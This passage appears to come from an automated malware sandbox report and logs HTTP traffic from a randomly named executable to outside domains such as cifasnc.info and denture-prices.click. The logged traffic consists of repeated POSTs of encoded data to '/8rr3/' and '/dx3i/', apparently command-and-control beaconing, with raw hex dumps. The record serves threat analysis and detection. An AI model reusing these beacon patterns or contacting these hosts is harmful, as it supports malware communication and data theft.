                                                                      Accept-Language: en-US
                                                                      Host: www.adadev.info
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Jan 13, 2025 15:14:05.589977026 CET139INHTTP/1.1 567 unknown
                                                                      Server: nginx/1.18.0
                                                                      Date: Mon, 13 Jan 2025 14:14:05 GMT
                                                                      Content-Length: 17
                                                                      Connection: close
                                                                      Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                                      Data Ascii: Request too large


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      33192.168.2.849742188.114.96.3801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:14:10.651235104 CET737OUTPOST /8rr3/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.cifasnc.info
                                                                      Origin: http://www.cifasnc.info
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 205
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.cifasnc.info/8rr3/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 36 30 71 34 3d 76 4c 55 42 6c 6d 50 52 4b 6b 32 62 79 65 46 2f 71 67 46 34 34 76 6f 43 50 52 63 52 77 65 32 69 56 65 70 64 6c 52 2f 5a 76 52 74 61 54 55 34 38 6d 64 65 73 35 4b 6b 4a 4a 53 69 69 59 4b 33 56 70 4c 76 68 42 57 48 70 65 57 2f 77 66 6e 56 71 41 39 6f 57 2b 32 58 35 4a 30 62 59 34 4d 2f 30 56 56 50 70 6f 43 31 6e 36 34 50 6e 44 57 34 77 66 4d 43 66 69 6e 63 30 42 57 6f 66 66 51 72 69 6c 4b 65 4f 62 2b 2b 72 75 76 59 71 65 79 37 50 56 59 31 52 73 5a 64 6c 6e 4e 79 6f 58 38 39 47 69 43 6e 51 71 65 38 57 36 34 43 30 4c 7a 48 64 79 6e 37 37 6d 31 42 6e 46 62 30 4d 70 4a 34 45 66 54 34 2b 5a 49 51 3d
                                                                      Data Ascii: 60q4=vLUBlmPRKk2byeF/qgF44voCPRcRwe2iVepdlR/ZvRtaTU48mdes5KkJJSiiYK3VpLvhBWHpeW/wfnVqA9oW+2X5J0bY4M/0VVPpoC1n64PnDW4wfMCfinc0BWoffQrilKeOb++ruvYqey7PVY1RsZdlnNyoX89GiCnQqe8W64C0LzHdyn77m1BnFb0MpJ4EfT4+ZIQ=
                                                                      Jan 13, 2025 15:14:11.180357933 CET1236INHTTP/1.1 404 Not Found
                                                                      Date: Mon, 13 Jan 2025 14:14:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      x-pingback: http://cifasnc.info/xmlrpc.php
                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                      last-modified: Mon, 13 Jan 2025 14:14:11 GMT
                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                      pragma: no-cache
                                                                      vary: Accept-Encoding,User-Agent
                                                                      x-turbo-charged-by: LiteSpeed
                                                                      cf-cache-status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WztCxx0eK0vg2HKYMua7f25IHQr5jEqC68WM%2FZ2tposYXB%2Bn7Hwsr2CIf5mPTla9CnT%2FI81z9vGnJgBCWfNBdgwBFpvfiAvgO9txM8KLh9TZBMutm%2B6naSZRsLuWYeiY7jrh"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 9015fdbf1e49c45c-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1673&min_rtt=1673&rtt_var=836&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=737&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 35 31 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 dd 6f dc 36 0c 7f ce 01 f9 1f 58 0d c8 b5 d8 7c 4e fa b1 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec 8f 1f 24 f9 f3 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5 4c e2 20
                                                                      Data Ascii: 51eWo6X|NKAgYR$.$zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#L
                                                                      Jan 13, 2025 15:14:11.180411100 CET1159INData Raw: b4 48 38 13 b7 a0 91 a7 44 69 59 32 8e 04 6a 8d 65 4a 6a 6b d5 9b 38 ae 1a 55 ad a4 ae e2 fb 52 c4 17 17 01 61 3c 64 ec 8e a3 a9 11 2d 01 bb 53 98 12 8b f7 36 ce 8d 21 d0 60 c1 68 4a 28 e7 7b 3a a7 96 c4 5b 15 e5 52 58 14 36 b6 35 36 68 e2 5b 54
                                                                      Data Ascii: H8DiY2jeJjk8URa<d-S6!`hJ({:[RX656h[Thcy!)oVJj4{{R2)bm'N8oxD,R6k;|(a3o)q|PJ40L&rhVXuDT2 ,!,m0%


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      34192.168.2.849743188.114.96.3801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:14:13.210578918 CET757OUTPOST /8rr3/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.cifasnc.info
                                                                      Origin: http://www.cifasnc.info
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 225
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.cifasnc.info/8rr3/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 36 30 71 34 3d 76 4c 55 42 6c 6d 50 52 4b 6b 32 62 67 75 31 2f 6f 44 74 34 2b 50 6f 46 41 78 63 52 37 2b 32 6d 56 5a 68 64 6c 53 7a 4a 73 6e 39 61 54 32 51 38 6e 66 6d 73 36 4b 6b 4a 43 79 69 37 46 61 33 53 70 4c 72 44 42 57 72 70 65 53 76 77 66 6e 6c 71 41 4b 38 58 38 6d 58 2f 50 30 62 57 6e 63 2f 30 56 56 50 70 6f 43 78 4e 36 38 62 6e 41 6e 6f 77 66 70 69 41 38 58 63 31 47 57 6f 66 62 51 72 59 6c 4b 65 38 62 38 4b 4e 75 72 6f 71 65 79 72 50 56 71 4e 65 6d 5a 64 6a 36 39 7a 62 54 35 4d 59 6f 69 6a 68 72 65 77 34 34 37 61 36 4f 46 32 33 6f 46 7a 39 6c 31 70 4d 46 59 63 36 73 2b 6c 73 46 77 6f 4f 48 66 48 6d 36 54 61 45 50 31 48 35 48 6e 7a 6b 65 4f 7a 48 5a 30 57 56
                                                                      Data Ascii: 60q4=vLUBlmPRKk2bgu1/oDt4+PoFAxcR7+2mVZhdlSzJsn9aT2Q8nfms6KkJCyi7Fa3SpLrDBWrpeSvwfnlqAK8X8mX/P0bWnc/0VVPpoCxN68bnAnowfpiA8Xc1GWofbQrYlKe8b8KNuroqeyrPVqNemZdj69zbT5MYoijhrew447a6OF23oFz9l1pMFYc6s+lsFwoOHfHm6TaEP1H5HnzkeOzHZ0WV
                                                                      Jan 13, 2025 15:14:13.785774946 CET1236INHTTP/1.1 404 Not Found
                                                                      Date: Mon, 13 Jan 2025 14:14:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      x-pingback: http://cifasnc.info/xmlrpc.php
                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                      last-modified: Mon, 13 Jan 2025 14:14:13 GMT
                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                      pragma: no-cache
                                                                      vary: Accept-Encoding,User-Agent
                                                                      x-turbo-charged-by: LiteSpeed
                                                                      cf-cache-status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FHWRhTN%2F%2BKdcKIs8bVUyZIHsBXF6lQFk5n3ppahO7ud0yFXWHYp8LTkLzNwLgbD9B0JCbTtWncBCwI0dj1laOH9sgpW8fHALVDziLWql0gvk7qBBT6huNKKd1r9%2FXW0wNyZj"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 9015fdcf4bd55e70-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1583&min_rtt=1583&rtt_var=791&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=757&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 35 31 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 dd 6f dc 36 0c 7f ce 01 f9 1f 58 0d c8 b5 d8 7c 4e fa b1 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec 8f 1f 24 f9 f3 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5 4c e2 20
                                                                      Data Ascii: 512Wo6X|NKAgYR$.$zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#L
                                                                      Jan 13, 2025 15:14:13.785795927 CET1164INData Raw: b4 48 38 13 b7 a0 91 a7 44 69 59 32 8e 04 6a 8d 65 4a 6a 6b d5 9b 38 ae 1a 55 ad a4 ae e2 fb 52 c4 17 17 01 61 3c 64 ec 8e a3 a9 11 2d 01 bb 53 98 12 8b f7 36 ce 8d 21 d0 60 c1 68 4a 28 e7 7b 3a a7 96 c4 5b 15 e5 52 58 14 36 b6 35 36 68 e2 5b 54
                                                                      Data Ascii: H8DiY2jeJjk8URa<d-S6!`hJ({:[RX656h[Thcy!)oVJj4{{R2)bm'N8oxD,R6k;|(a3o)q|PJ40L&rhVXuDT2 ,!,m0%


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      35192.168.2.849744188.114.96.3801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:14:15.770267010 CET1774OUTPOST /8rr3/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.cifasnc.info
                                                                      Origin: http://www.cifasnc.info
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 1241
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.cifasnc.info/8rr3/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 36 30 71 34 3d 76 4c 55 42 6c 6d 50 52 4b 6b 32 62 67 75 31 2f 6f 44 74 34 2b 50 6f 46 41 78 63 52 37 2b 32 6d 56 5a 68 64 6c 53 7a 4a 73 6e 31 61 53 48 77 38 6e 34 4b 73 37 4b 6b 4a 42 79 69 2b 46 61 33 44 70 50 2f 48 42 57 58 35 65 51 6e 77 46 45 74 71 49 62 38 58 32 6d 58 2f 44 55 62 58 34 4d 2f 68 56 56 2b 69 6f 43 68 4e 36 38 62 6e 41 6b 67 77 57 63 43 41 2b 58 63 30 42 57 6f 54 66 51 71 33 6c 4b 47 47 62 38 4f 37 75 59 67 71 64 57 33 50 46 50 5a 65 37 4a 64 68 71 74 7a 44 54 35 49 35 6f 69 76 6c 72 64 73 53 34 37 79 36 50 31 37 62 37 57 62 68 34 56 46 6f 46 34 6c 46 6b 64 64 4d 45 78 73 62 4e 2b 6a 43 78 47 76 76 44 55 61 77 54 45 69 4b 63 49 48 56 55 30 2b 63 61 55 46 66 39 38 70 53 6b 47 58 48 32 6f 65 5a 77 55 39 72 4c 6b 2b 44 64 66 31 68 6b 4a 52 4e 6f 4b 68 54 5a 4a 53 66 72 49 69 73 55 4e 6b 6c 2f 4b 65 2f 6c 50 71 6c 61 46 39 78 4c 49 34 4c 63 36 49 73 74 33 79 48 38 6b 51 35 7a 58 31 38 2b 53 30 61 67 56 55 43 56 4e 43 35 4b 42 66 41 36 75 51 2f 53 56 78 4e 6b 45 2f 61 53 39 6d 77 54 [TRUNCATED]
                                                                      Data Ascii: 60q4=vLUBlmPRKk2bgu1/oDt4+PoFAxcR7+2mVZhdlSzJsn1aSHw8n4Ks7KkJByi+Fa3DpP/HBWX5eQnwFEtqIb8X2mX/DUbX4M/hVV+ioChN68bnAkgwWcCA+Xc0BWoTfQq3lKGGb8O7uYgqdW3PFPZe7JdhqtzDT5I5oivlrdsS47y6P17b7Wbh4VFoF4lFkddMExsbN+jCxGvvDUawTEiKcIHVU0+caUFf98pSkGXH2oeZwU9rLk+Ddf1hkJRNoKhTZJSfrIisUNkl/Ke/lPqlaF9xLI4Lc6Ist3yH8kQ5zX18+S0agVUCVNC5KBfA6uQ/SVxNkE/aS9mwTovUv+11WvrCFU8tLxP8haU6zVGI48AE4HnOtcuZb5FcZM1EfPSVN8r4FLqxOaQ5XBp0k1BuwC1ziKlrV6+z/YqCrc6yeSuv8nvs6zmEiobpMnim8WExSP/jrIJqMmiaWvgGUMs9WeNcrKahFJkoJ19k9XbCqztmFKAeKHp0GfMzrcktNuTFRPk2uuU1F7wnW6b6jSvLCJOu06iy2fNzxY7WqCYpDn55u32OgvqV/dqpgpL5kAF9wB2R3+ZdWf7khaTSTM0eh8HHqImi3IFWeUfn2/BR2G2JgEdhpZ6nnTl4LVqGeLxZsj+C55OOJgKRfmVeZ9KXszhNRGHvOlJLvm/5E79wXMQ6IhNoMcTw5nXHSgrqIqprSfZ+W9kFjTdMBY0uqrXu8mJ32nQU6jR4GU9jSI786bPSRwl3yRx0j0dV3/tp6EegKCVXGrMLbVqN7vOng7XFFkP+ienRV+/uS5Sb5H2Hjns7fXsfKD64FbpUaQXq/qkunokXzgX2KJ7o63AftNjtn1G1NFRzhYoZni5Pvw6PIq9qcpYJm95zpGv9m8IHc0rB8dCb7yhI/cp51coh7hZJ8vtuLEQiYpzUtSDZCvnMP4YcXMB9fhkIIwYg4Tw2DblWBPIHSR6XS+bP3bcuiQCvKCZpV0w+9JXQp+R0hweWA0j0ytV [TRUNCATED]
                                                                      Jan 13, 2025 15:14:16.279290915 CET1236INHTTP/1.1 404 Not Found
                                                                      Date: Mon, 13 Jan 2025 14:14:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      x-pingback: http://cifasnc.info/xmlrpc.php
                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                      last-modified: Mon, 13 Jan 2025 14:14:16 GMT
                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                      pragma: no-cache
                                                                      vary: Accept-Encoding,User-Agent
                                                                      x-turbo-charged-by: LiteSpeed
                                                                      cf-cache-status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p%2BaLznEpSdqk%2F4rT0453YF2BVBhlZd%2FvKuH4kK%2FJtAvCbILR4fi70jaHf7BMt7HxjYc76wZt1ENhx2PgpeDKJvlLBV6t2egXNgAGRXqbI6ZRXPV5FRmSXVkR6WFuTxIx8uJ5"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 9015fddf0e82efa5-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1898&min_rtt=1898&rtt_var=949&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1774&delivery_rate=0&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 35 31 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 dd 6f dc 36 0c 7f ce 01 f9 1f 58 0d c8 b5 d8 7c 4e fa b1 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec 8f 1f 24 f9 f3 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5 4c e2
                                                                      Data Ascii: 51eWo6X|NKAgYR$.$zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#L
                                                                      Jan 13, 2025 15:14:16.279359102 CET1160INData Raw: 20 b4 48 38 13 b7 a0 91 a7 44 69 59 32 8e 04 6a 8d 65 4a 6a 6b d5 9b 38 ae 1a 55 ad a4 ae e2 fb 52 c4 17 17 01 61 3c 64 ec 8e a3 a9 11 2d 01 bb 53 98 12 8b f7 36 ce 8d 21 d0 60 c1 68 4a 28 e7 7b 3a a7 96 c4 5b 15 e5 52 58 14 36 b6 35 36 68 e2 5b
                                                                      Data Ascii: H8DiY2jeJjk8URa<d-S6!`hJ({:[RX656h[Thcy!)oVJj4{{R2)bm'N8oxD,R6k;|(a3o)q|PJ40L&rhVXuDT2 ,!,m0%


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      36192.168.2.849745188.114.96.3801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:14:18.310914993 CET482OUTGET /8rr3/?60q4=iJ8hmWjdEFuk0u06tRtBw99RNA0cmJToU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg+eEASr+Wzr+b0deN6ZH6lv1Dk2KgOeGcWS57RgWwvqcZEoOC4yFjEhnf2QufT28mA==&XxGx=INH0eLoh HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Host: www.cifasnc.info
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Jan 13, 2025 15:14:18.811443090 CET1236INHTTP/1.1 301 Moved Permanently
                                                                      Date: Mon, 13 Jan 2025 14:14:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      x-pingback: http://cifasnc.info/xmlrpc.php
                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                      last-modified: Mon, 13 Jan 2025 14:14:18 GMT
                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                      pragma: no-cache
                                                                      location: http://cifasnc.info/8rr3/?60q4=iJ8hmWjdEFuk0u06tRtBw99RNA0cmJToU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg+eEASr+Wzr+b0deN6ZH6lv1Dk2KgOeGcWS57RgWwvqcZEoOC4yFjEhnf2QufT28mA==&XxGx=INH0eLoh
                                                                      vary: User-Agent
                                                                      x-turbo-charged-by: LiteSpeed
                                                                      cf-cache-status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n3EOkbyTwPMHTWGz8qyYbn2unNfAxKkn2%2FBCzgrdIjRtGk%2FL6Jw87CDGgf44BEco%2FtLYOp3cke0BQONBhclVBQMttSfNufFzJEOUDrPhjgAEqs8sXM%2Bq%2BG91O83eSw98n9dA"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 9015fdeedd614303-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1555&min_rtt=1555&rtt_var=777&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=482&delivery_rate=0&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 30 0d 0a 0d
                                                                      Data Ascii: 0
                                                                      Jan 13, 2025 15:14:18.811465979 CET1INData Raw: 0a
                                                                      Data Ascii:


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      37192.168.2.849746199.59.243.228801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:14:32.060108900 CET761OUTPOST /dx3i/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.denture-prices.click
                                                                      Origin: http://www.denture-prices.click
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 205
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.denture-prices.click/dx3i/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 36 30 71 34 3d 51 2b 69 53 35 57 69 5a 4f 70 49 6f 2f 58 4d 45 62 39 30 66 4d 62 62 44 46 4b 78 78 2f 43 43 73 38 6b 56 35 57 47 78 7a 65 79 52 76 59 4c 45 47 54 54 41 52 64 6e 35 73 72 58 6f 4d 58 53 6c 73 58 71 33 64 4d 4a 4b 31 6c 42 47 5a 6a 45 33 53 36 4f 6c 36 5a 30 44 41 39 47 46 6f 71 6d 4c 58 5a 2f 44 4b 64 4b 41 37 6b 64 73 65 4c 6f 52 46 49 47 58 57 5a 6b 49 67 6b 54 39 62 63 64 42 70 57 66 42 66 2b 4a 46 78 48 65 77 4d 6e 6b 63 31 70 37 2b 6c 51 51 33 44 65 6e 2b 78 45 62 50 49 47 58 74 4d 51 77 7a 73 6d 6b 44 76 34 34 47 6d 42 78 79 6c 77 34 50 53 78 4b 71 6f 6b 43 77 2b 30 54 57 4e 35 39 67 3d
                                                                      Data Ascii: 60q4=Q+iS5WiZOpIo/XMEb90fMbbDFKxx/CCs8kV5WGxzeyRvYLEGTTARdn5srXoMXSlsXq3dMJK1lBGZjE3S6Ol6Z0DA9GFoqmLXZ/DKdKA7kdseLoRFIGXWZkIgkT9bcdBpWfBf+JFxHewMnkc1p7+lQQ3Den+xEbPIGXtMQwzsmkDv44GmBxylw4PSxKqokCw+0TWN59g=
                                                                      Jan 13, 2025 15:14:32.502594948 CET1236INHTTP/1.1 200 OK
                                                                      date: Mon, 13 Jan 2025 14:14:31 GMT
                                                                      content-type: text/html; charset=utf-8
                                                                      content-length: 1146
                                                                      x-request-id: 5d7143f2-8fd2-4d90-bb4a-63126e53dff9
                                                                      cache-control: no-store, max-age=0
                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                      vary: sec-ch-prefers-color-scheme
                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n6kA0EWYJHvI8PDq8Zy6kmv+rMkPDXtErk9t2ugLCuL0Rt9pQRHZKCMmJFhMaZLjVHwUzsDAVsEwPGdd+RD6Dw==
                                                                      set-cookie: parking_session=5d7143f2-8fd2-4d90-bb4a-63126e53dff9; expires=Mon, 13 Jan 2025 14:29:32 GMT; path=/
                                                                      connection: close
                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6e 36 6b 41 30 45 57 59 4a 48 76 49 38 50 44 71 38 5a 79 36 6b 6d 76 2b 72 4d 6b 50 44 58 74 45 72 6b 39 74 32 75 67 4c 43 75 4c 30 52 74 39 70 51 52 48 5a 4b 43 4d 6d 4a 46 68 4d 61 5a 4c 6a 56 48 77 55 7a 73 44 41 56 73 45 77 50 47 64 64 2b 52 44 36 44 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n6kA0EWYJHvI8PDq8Zy6kmv+rMkPDXtErk9t2ugLCuL0Rt9pQRHZKCMmJFhMaZLjVHwUzsDAVsEwPGdd+RD6Dw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                      Jan 13, 2025 15:14:32.502618074 CET599INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNWQ3MTQzZjItOGZkMi00ZDkwLWJiNGEtNjMxMjZlNTNkZmY5IiwicGFnZV90aW1lIjoxNzM2Nzc3Nj


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
